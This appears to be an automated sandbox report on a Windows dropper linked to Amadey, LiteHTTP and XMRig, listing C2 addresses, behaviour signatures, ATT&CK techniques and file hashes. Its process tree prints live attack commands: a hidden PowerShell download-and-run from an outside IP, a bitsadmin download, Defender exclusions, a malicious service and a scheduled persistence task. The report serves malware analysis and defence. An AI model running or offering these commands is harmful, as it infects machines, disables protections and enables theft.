Overview

overview

10

Static

static

5

74bfc29b66...8d.exe

windows7-x64

10

74bfc29b66...8d.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 17:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe

  • Size

    938KB

  • MD5

    f05c426533feda04db6bff6509118219

  • SHA1

    1d14d9f5090f9823f8bcf5f11815ab96fe5ac448

  • SHA256

    74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d

  • SHA512

    5f3d0c65ae241842ee84bedc24ef29e06961206c1c6757a1a9d7e52a826f350aca04c1e0f91780e5c084cd91a2757f0a80f064c805c152005952619444383139

  • SSDEEP

    24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0pu:/TvC/MTQYxsWR7a0p

Score
10/10
amadeylitehttpxmrig092155botdefense_evasiondiscoverydropperexecutionminerpersistencespywarestealertrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
    defense_evasion
  • XMRig Miner payload 9 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Downloads MZ/PE file 8 IoCs
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe
    "C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn iE2timai3HX /tr "mshta C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn iE2timai3HX /tr "mshta C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4500
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Users\Admin\AppData\Local\TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE
          "C:\Users\Admin\AppData\Local\TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4424
            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4552
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\qynnBWJd\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2664
            • C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe
              "C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1840
            • C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe
              "C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              PID:2644
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1352
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:744
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  8⤵
                    PID:768
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3524
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1208
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4580
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3812
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "DWENDQPG"
                  7⤵
                  • Launches sc.exe
                  PID:2520
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
                  7⤵
                  • Launches sc.exe
                  PID:2556
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  7⤵
                  • Launches sc.exe
                  PID:4436
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "DWENDQPG"
                  7⤵
                  • Launches sc.exe
                  PID:1912
              • C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
                "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1108
                • C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
                  "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4124
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 800
                  7⤵
                  • Program crash
                  PID:1128
              • C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe
                "C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3684
                • C:\Windows\Temp\{E5F65D12-58D0-4DE3-81AF-2019BCA8F247}\.cr\Y87Oyyz.exe
                  "C:\Windows\Temp\{E5F65D12-58D0-4DE3-81AF-2019BCA8F247}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe" -burn.filehandle.attached=544 -burn.filehandle.self=552
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4816
                  • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\SplashWin.exe
                    C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\SplashWin.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2976
                    • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                      C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:4736
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        10⤵
                        • Drops startup file
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: MapViewOfSection
                        PID:1060
                        • C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
                          C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
                          11⤵
                          • Loads dropped DLL
                          PID:888
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10105221121\fCsM05d.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4708
                • C:\Windows\SysWOW64\fltMC.exe
                  fltmc
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:764
                • C:\Windows\SysWOW64\bitsadmin.exe
                  bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                  7⤵
                  • Download via BitsAdmin
                  • System Location Discovery: System Language Discovery
                  PID:4092
              • C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe
                "C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3240
              • C:\Users\Admin\AppData\Local\Temp\10105240101\Ps7WqSx.exe
                "C:\Users\Admin\AppData\Local\Temp\10105240101\Ps7WqSx.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2580
              • C:\Users\Admin\AppData\Local\Temp\10105250101\FvbuInU.exe
                "C:\Users\Admin\AppData\Local\Temp\10105250101\FvbuInU.exe"
                6⤵
                  PID:2024
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:3492
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1108 -ip 1108
        1⤵
          PID:3472
        • C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
          C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
          1⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4084
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4524
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\system32\wusa.exe
              wusa /uninstall /kb:890830 /quiet /norestart
              3⤵
                PID:4028
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              2⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:464
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              2⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:3956
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              2⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:1108
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              2⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:1980
            • C:\Windows\system32\conhost.exe
              C:\Windows\system32\conhost.exe
              2⤵
                PID:1868
              • C:\Windows\explorer.exe
                explorer.exe
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2340
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              1⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1560

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            System Services

            2
            T1569

            Service Execution

            2
            T1569.002

            Persistence

            BITS Jobs

            1
            T1197

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            2
            T1543

            Windows Service

            2
            T1543.003

            Power Settings

            1
            T1653

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            2
            T1543

            Windows Service

            2
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            BITS Jobs

            1
            T1197

            Impair Defenses

            1
            T1562

            Modify Registry

            1
            T1112

            Virtualization/Sandbox Evasion

            2
            T1497

            Credential Access

            Credentials from Password Stores

            1
            T1555

            Credentials from Web Browsers

            1
            T1555.003

            Unsecured Credentials

            3
            T1552

            Credentials In Files

            3
            T1552.001

            Discovery

            Browser Information Discovery

            1
            T1217

            Query Registry

            5
            T1012

            System Information Discovery

            3
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            Virtualization/Sandbox Evasion

            2
            T1497

            Lateral Movement

            Collection

            Data from Local System

            3
            T1005

            Command and Control

            Exfiltration

            Impact

            Service Stop

            1
            T1489

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              440cb38dbee06645cc8b74d51f6e5f71

              SHA1

              d7e61da91dc4502e9ae83281b88c1e48584edb7c

              SHA256

              8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

              SHA512

              3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              16KB

              MD5

              8969d6408fc3f6d515135769db21f8bb

              SHA1

              0de375178dc80558d89dc9b461182227b34d2419

              SHA256

              5e4f85f18b0e9a4afd11ef5e438a740d18a3955f5b0fc15e0eae20f5ae12f5dc

              SHA512

              ba917e54a4fc05caff2ecd883ae4e2dc8cead55c78fdb6884d4859c878490cedcb8acb9b51b6ee54cbfe6b81ff04d13124e2c8615e5ada6750b08cf9a1c3d1ea

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              948B

              MD5

              0ef66c6f329dcf291f3f58cf70254c9c

              SHA1

              afc81197981e660754f21686c0d5558422dba011

              SHA256

              d60995fb02968d9e5cc8eb7232d64c69b8ac587f609e23cc0cbfac6d072f931e

              SHA512

              1175072ff46d82757d498792885a65d3715bc9d387f9569a7415b3270a1a38f64f50fa82e0c4cc3859079124188497b60fa6f8b1c7e0fa854b40c75ea038b9dc

              Download Submit

            • C:\Users\Admin\AppData\Local\TempLDSFK7EYB8RCSORPYWUXXW8EYAZPAHRV.EXE
              Filesize

              1.8MB

              MD5

              895d364d98674fc39c6c2ca1607c189c

              SHA1

              089147d7501025cfc4f8b84305dfd211c8708be4

              SHA256

              43374f0238ae8b778ff340a81a654269894b69815eae179af6634bcf08c96301

              SHA512

              56a3e90dc994f061431c5173021cc234cacb37e3cdb1df5f073c92d90fff7495385277da29abf839b77b4cbcf36ca318a2a83f6fbfd484670527e97f45be4d9d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              Filesize

              48KB

              MD5

              d39df45e0030e02f7e5035386244a523

              SHA1

              9ae72545a0b6004cdab34f56031dc1c8aa146cc9

              SHA256

              df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

              SHA512

              69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe
              Filesize

              2.0MB

              MD5

              6006ae409307acc35ca6d0926b0f8685

              SHA1

              abd6c5a44730270ae9f2fce698c0f5d2594eac2f

              SHA256

              a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

              SHA512

              b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe
              Filesize

              5.0MB

              MD5

              ddab071e77da2ca4467af043578d080c

              SHA1

              226518a5064c147323482ac8db8479efd4c074f8

              SHA256

              d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c

              SHA512

              e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
              Filesize

              415KB

              MD5

              641525fe17d5e9d483988eff400ad129

              SHA1

              8104fa08cfcc9066df3d16bfa1ebe119668c9097

              SHA256

              7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a

              SHA512

              ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe
              Filesize

              5.7MB

              MD5

              5fb40d81dac830b3958703aa33953f4f

              SHA1

              8f4689497df5c88683299182b8b888046f38c86a

              SHA256

              b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc

              SHA512

              80b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105221121\fCsM05d.cmd
              Filesize

              1KB

              MD5

              9e4466ae223671f3afda11c6c1e107d1

              SHA1

              438b65cb77e77a41e48cdb16dc3dee191c2729c7

              SHA256

              ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f

              SHA512

              3f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe
              Filesize

              361KB

              MD5

              2bb133c52b30e2b6b3608fdc5e7d7a22

              SHA1

              fcb19512b31d9ece1bbe637fe18f8caf257f0a00

              SHA256

              b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

              SHA512

              73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105240101\Ps7WqSx.exe
              Filesize

              6.8MB

              MD5

              dab2bc3868e73dd0aab2a5b4853d9583

              SHA1

              3dadfc676570fc26fc2406d948f7a6d4834a6e2c

              SHA256

              388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

              SHA512

              3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10105250101\FvbuInU.exe
              Filesize

              1.8MB

              MD5

              9dadf2f796cd4500647ab74f072fd519

              SHA1

              92b6c95a6ed1e120488bd28ac74274e874f6e740

              SHA256

              e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76

              SHA512

              fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\8946d56c
              Filesize

              5.5MB

              MD5

              9adfa89dbb163ed7569af9a66b8afeac

              SHA1

              ca203c7d66487670b97c0014d71f9ad8152cffd0

              SHA256

              da49cf976ea6de10ea43ceef05575cd8e43d8ce689ed8f2e6b415ed87465d54e

              SHA512

              1d2cc4e158c3b46b69fa0a7bc1f557ea4f6943ef806abe51a838273b5b5aab4fc389064dd19b075768c2db76b9e7c970f0fbf287630c973ea1652d3391e2fb22

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
              Filesize

              2.3MB

              MD5

              967f4470627f823f4d7981e511c9824f

              SHA1

              416501b096df80ddc49f4144c3832cf2cadb9cb2

              SHA256

              b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91

              SHA512

              8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxyqyai1.jmb.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\mqfws
              Filesize

              928B

              MD5

              9171eb771cbab4e4c6aa183fcd1cc72b

              SHA1

              ac84e72aced31c1416431c7e7d9ef0ccf858281d

              SHA256

              f1772c8816ec748c7bfce89737ec20d0b44805426997cdd356788aa045e074dd

              SHA512

              faf0fa9c2471383ea621706be9efb32d1f4bfa63d33d49e32b055c69dc666822e6621e18b4773fee41c5a435d5e792e8c101a57028cf0306372cd0ff21a9713b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\sZkO8QsVL.hta
              Filesize

              717B

              MD5

              c2c8db0f0e98f79190e1219784f334f7

              SHA1

              fe25bf1382f9508c89f4694d197562bd0b27dc5e

              SHA256

              f90c9f48d6ac0501628457d7f7ddcae920af784f1e365d21e7b2342dfce21381

              SHA512

